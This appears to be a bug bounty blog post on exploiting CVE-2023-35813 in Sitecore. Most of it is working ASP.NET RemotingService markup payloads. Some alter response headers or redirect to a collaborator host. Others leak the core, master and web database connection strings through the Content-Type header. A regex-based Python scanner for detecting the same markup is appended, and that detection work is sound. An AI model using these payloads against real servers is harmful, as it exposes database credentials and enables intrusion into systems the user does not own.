Exploiting CVE-2023-35813: Retrieving Core Connection Strings in Sitecore

Abhishek Morla
2 min read · Dec 25, 2023


In the realm of cybersecurity, the discovery and analysis of vulnerabilities play a crucial role. CVE-2023-35813, a notable vulnerability in Sitecore, opens a window into understanding the delicate balance between exploiting a weakness for profit and the ethics of responsible disclosure. This article sheds light on the practical aspects of exploiting this vulnerability, specifically retrieving the core connection string.

Exploring CVE-2023-35813

For a detailed understanding of CVE-2023-35813, refer to the insightful blog post on Code White's blog. That resource provides a comprehensive backdrop and sets the stage for a deeper dive into the actual exploitation process.

Practical Exploitation in the Absence of SMB

Authored by abhishekmorla, this section delves into the hands-on approach to exploiting CVE-2023-35813 when Server Message Block (SMB) is not available. This scenario, while reducing the CVSS score, still presents significant opportunities for extracting valuable information; the steps below demonstrate how to manipulate different aspects of the server's response. This manipulation not only showcases the vulnerability's impact but also guides what to include in a bug bounty report for enhanced effectiveness.

1. Start by changing the content type:

<%@Register
TagPrefix = 'x'
Namespace = 'System.Runtime.Remoting.Services'
Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
%>
<x:RemotingService runat='server'
Context-Response-ContentType='abhishekmorla was here'
/>

2. Altering Status Code:

<%@Register
TagPrefix = 'x'
Namespace = 'System.Runtime.Remoting.Services'
Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
%>
<x:RemotingService runat='server'
Context-Response-StatusCode='302'
/>

3. Redirecting to a Different Location:

<%@Register
TagPrefix = 'x'
Namespace = 'System.Runtime.Remoting.Services'
Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
%>
<x:RemotingService runat='server'
Context-Response-StatusCode='302'
Context-Response-RedirectLocation='http://burp.collab'
/>

The above modifications, while demonstrating the exploit, might not be appropriate for bug bounty platform reports.

Retrieving Connection Strings:

1. For the core connection string:

<%@Register
TagPrefix = 'x'
Namespace = 'System.Runtime.Remoting.Services'
Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
%>
<x:RemotingService runat='server'
Context-Response-ContentType='<%$ ConnectionStrings:core %>'
/>

2. For the master connection string:

<%@Register
TagPrefix = 'x'
Namespace = 'System.Runtime.Remoting.Services'
Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
%>
<x:RemotingService runat='server'
Context-Response-ContentType='<%$ ConnectionStrings:master %>'
/>

3. For the web connection string:

<%@Register
TagPrefix = 'x'
Namespace = 'System.Runtime.Remoting.Services'
Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
%>
<x:RemotingService runat='server'
Context-Response-ContentType='<%$ ConnectionStrings:web %>'
/>
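
From the defender's side, the markup above has a recognisable shape: a `Register` directive for `System.Runtime.Remoting.Services`, a `RemotingService` tag carrying `Context-Response-*` attributes, and optionally a `<%$ ConnectionStrings:... %>` expression. The following scanner is an added example, not code from the original post or from Sitecore; it flags uploaded or on-disk ASP.NET markup that matches those patterns, using constructed sample inputs, so it can feed an upload filter or an alert.

```python
import re
from typing import Dict, List

# Patterns lifted from the snippets in this post (constructed detection logic).
REMOTING_REGISTER = re.compile(
    r"<%@\s*Register\b[^%]*Namespace\s*=\s*['\"]System\.Runtime\.Remoting\.Services['\"]",
    re.IGNORECASE,
)
CONTEXT_RESPONSE_ATTR = re.compile(r"\bContext-Response-([A-Za-z]+)\s*=", re.IGNORECASE)
CONNSTR_EXPR = re.compile(r"<%\$\s*ConnectionStrings\s*:\s*(\w+)\s*%>", re.IGNORECASE)


def scan_markup(text: str) -> Dict[str, object]:
    """Classify one ASP.NET markup blob (for example an uploaded .aspx/.ascx body)."""
    attrs: List[str] = [m.group(1) for m in CONTEXT_RESPONSE_ATTR.finditer(text)]
    refs: List[str] = [m.group(1) for m in CONNSTR_EXPR.finditer(text)]
    registers_remoting = bool(REMOTING_REGISTER.search(text))
    if registers_remoting and refs:
        severity = "high"      # response header populated from ConnectionStrings
    elif registers_remoting and attrs:
        severity = "medium"    # response tampering via Context-Response-* attributes
    else:
        severity = "none"
    return {"remoting": registers_remoting, "attrs": attrs,
            "connection_strings": refs, "severity": severity}


# Constructed samples: a benign control, the status-code variant, and the
# core connection-string variant shown in the post.
BENIGN = "<%@ Page Language='C#' %>\n<asp:Label runat='server' Text='hello' />"
STATUS = ("<%@Register\nTagPrefix = 'x'\nNamespace = 'System.Runtime.Remoting.Services'\n"
          "Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, "
          "PublicKeyToken=b77a5c561934e089'\n%>\n"
          "<x:RemotingService runat='server'\nContext-Response-StatusCode='302'\n/>")
CORE = STATUS.replace("Context-Response-StatusCode='302'",
                      "Context-Response-ContentType='<%$ ConnectionStrings:core %>'")


def triage(samples: Dict[str, str]) -> Dict[str, str]:
    """Map sample name -> severity, the shape an upload filter or SIEM rule would consume."""
    return {name: str(scan_markup(body)["severity"]) for name, body in samples.items()}


if __name__ == "__main__":
    for name, sev in triage({"benign": BENIGN, "status": STATUS, "core": CORE}).items():
        print(f"{name}: {sev}")
```

The same regexes can be pointed at IIS request bodies or at the Sitecore media and layout folders on disk; a `high` hit means a connection string is being copied into a response header and warrants rotating that credential.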

Remember to include the above findings in your bug bounty report. Detailed reporting increases the likelihood of quick acceptance and of earning a bounty :)

For a comprehensive walkthrough, refer to the accompanying proof of concept (PoC): https://youtu.be/vWKl9wgdTB0

Thanks for reading!

LinkedIn: https://www.linkedin.com/in/abhishekmorla/

Twitter : https://twitter.com/abhishekmorla


Abhishek Morla

Security Consultant | CSE Student | Synack Red Team & Yogosha Member | Detectify Crowdsource Member | Prohacker at HacktheBox | 40+ Hall of fame